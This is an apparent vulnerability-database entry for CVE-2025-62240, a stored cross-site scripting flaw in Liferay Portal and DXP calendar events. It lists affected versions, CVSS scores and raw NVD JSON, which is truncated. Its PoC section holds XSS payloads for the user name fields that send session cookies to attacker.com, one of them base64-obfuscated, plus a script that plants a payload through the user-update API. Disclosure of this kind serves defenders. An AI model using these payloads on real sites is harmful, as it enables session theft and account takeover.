Security Vulnerability Report
CVE-2025-62240 CVSS 5.4 MEDIUM

CVE-2025-62240

Published: 2025-10-09 21:15:40
Last Modified: 2025-12-12 18:25:33

Description

Multiple cross-site scripting (XSS) vulnerabilities with Calendar events in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.7, 7.4 update 35 through update 92, and 7.3 update 25 through update 36 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name or (3) Last Name text field.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* (versions from 2023.Q3.1 up to, but excluding, 2023.Q3.8) - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* (versions from 2023.Q4.0 up to, but excluding, 2023.Q4.6) - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update25:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update26:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update27:*:*:*:*:*:* - VULNERABLE

Affected version ranges (as stated in the description):
Liferay Portal 7.4.3.35 through 7.4.3.111
Liferay DXP 2023.Q4.0 through 2023.Q4.5
Liferay DXP 2023.Q3.1 through 2023.Q3.7
Liferay DXP 7.4 update 35 through update 92
Liferay DXP 7.3 update 25 through update 36

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-62240 PoC - Stored XSS via User Name Fields in Liferay Calendar -->
<!-- Step 1: Attacker logs into Liferay Portal/DXP with a low-privilege account -->
<!-- Step 2: Navigate to User Profile settings and modify name fields with malicious payload -->

<!-- Payload for First Name field -->
<script>alert('XSS via First Name');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Payload for Middle Name field -->
<img src=x onerror="fetch('https://attacker.com/log',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:document.location.href})})">

<!-- Payload for Last Name field -->
<svg/onload=eval(atob('ZmV0Y2goImh0dHBzOi8vYXR0YWNrZXIuY29tLz9kYXRhPSIrZG9jdW1lbnQuY29va2llKQ=='))>

<!-- Step 3: Create or participate in a Calendar event that displays the attacker's user name -->
<!-- Step 4: When any victim (including admin) views the calendar event, the XSS payload executes -->

<!-- Automated exploitation script -->
<script>
// Simulating the attack flow
const maliciousPayload = '<img src=x onerror=alert(document.domain)>';

// Attacker sets First Name to maliciousPayload via Liferay API
fetch('/api/jsonws/user/update-user', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    firstName: maliciousPayload,
    middleName: '',
    lastName: 'TestUser'
  })
}).then(r => console.log('Payload stored'));

// When victim views calendar event containing this user, XSS triggers
</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62240", "sourceIdentifier": "[email protected]", "published": "2025-10-09T21:15:40.300", "lastModified": "2025-12-12T18:25:33.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple cross-site scripting (XSS) vulnerabilities with Calendar events in Liferay Portal 7.4.3.35 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.7, 7.4 update 35 through update 92, and 7.3 update 25 through update 36 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user’s (1) First Name, (2) Middle Name or (3) Last Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.Q3.1", "versionEndExcluding": "2023.Q3.8", "matchCriteriaId": "6411D407-A5BB-40F9-8416-394C7AF797D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update25:*:*:*:*:*:*", "matchCriteriaId": "DD43C626-F2F2-43BA-85AA-6ADAE8A6D11F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update26:*:*:*:*:*:*", "matchCriteriaId": "5C72C0E0-7D0B-4E8F-A109-7BB5DCA1C8D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update27:*:*:*:*:*:*", "matchCriteriaId": "7E796B04-FF54-4C02-979C-87E137A76F63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update28:*:*:*:*:*:*", 
"matchCriteriaId": "07C3D771-5E1B-46C4-AAF8-F425377582D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update29:*:*:*:*:*:*", "matchCriteriaId": "B08F95DC-BE49-4717-B959-2BE8BD131953"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update30:*:*:*:*:*:*", "matchCriteriaId": "E915FBC2-9BF7-4A99-B201-1F176D743494"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update31:*:*:*:*:*:*", "matchCriteriaId": "E44E02C2-6F83-4525-BF9D-E82CE9A9880E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update32:*:*:*:*:*:*", "matchCriteriaId": "660F37C6-61E6-4C34-8A7E-99C7DBEB8319"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update33:*:*:*:*:*:*", "matchCriteriaId": "5AD8D0D3-31AC-41E5-A780-5D5B18BF6991"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update34:*:*:*:*:*:*", "matchCrite ... (truncated)